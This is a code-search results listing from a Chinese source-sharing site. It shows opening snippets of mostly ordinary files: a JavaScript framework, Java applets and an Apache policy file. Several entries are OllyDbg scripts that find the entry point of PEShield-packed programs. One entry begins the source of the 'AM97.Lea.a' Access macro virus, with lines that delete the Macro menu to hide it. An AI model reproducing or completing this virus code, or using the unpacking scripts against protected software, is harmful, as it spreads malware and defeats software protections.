代码搜索:Codebase
找到约 2,188 项符合「Codebase」的源代码
代码结果 2,188
www.eeworm.com/read/168646/9903500
js jsframework.js
/*---------------------------------------------------------------------------*\
| Subject: Javascript Framework
| Author: meizz
| Created: 2005-02-27
| Version: 2006-05-03
|-----
www.eeworm.com/read/420826/10773385
java shaking.java
import java.applet.*;
import java.awt.*;
import java.net.MalformedURLException;
import java.net.URL;
public class Shaking extends Applet
implements Runnable
{
Thread runner = null;
www.eeworm.com/read/446780/7565167
java shaking.java
//Shaking.java
import java.applet.*;
import java.awt.*;
import java.net.MalformedURLException;
import java.net.URL;
public class Shaking extends Applet
implements Runnable
{
//变量声明
www.eeworm.com/read/440621/7685269
txt peshield 0.25 oep-finder.txt
/*
This script finds OEP for programs packed with PEShield v0.25 (I havn't tested for other versions)
IMPORTANT!
You have to hide OllyDbg from IsDebuggerPresent manually BEFORE you run this script
www.eeworm.com/read/440621/7685603
txt peshield 0.25 oep finder #1.txt
/*
This script finds OEP for programs packed with PEShield v0.25 (I havn't tested for other versions)
IMPORTANT!
You have to hide OllyDbg from IsDebuggerPresent manually BEFORE you run this script
www.eeworm.com/read/440621/7685664
txt peshield.txt
/*
This script finds OEP for programs packed with PEShield v0.25 (I havn't tested for other versions)
IMPORTANT!
You have to hide OllyDbg from IsDebuggerPresent manually BEFORE you run this script (Th
www.eeworm.com/read/440621/7685695
txt peshield 0.25 oep finder.txt
/*
This script finds OEP for programs packed with PEShield v0.25 (I havn't tested for other versions)
IMPORTANT!
You have to hide OllyDbg from IsDebuggerPresent manually BEFORE you run this script (Th
www.eeworm.com/read/243761/12918967
txt am97.lea.a源代码.txt
Option Compare Database
Option Explicit
Function Lea()
'AM97.Lea.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
On Error Resume Next
CommandBars("tools").Controls("Macro").Delete
Curren
www.eeworm.com/read/316990/13513093
java soundandimage.java
/*
* SoundAndImage.java E.L. 2001-08-13
*
* The image file duke.running.gif and the audio file spacemusic.au
* should be in the same directory as this applet.
* The image file is from vers
www.eeworm.com/read/312878/13602546
policy catalina.policy
// Licensed to the Apache Software Foundation (ASF) under one or more
// contributor license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyrig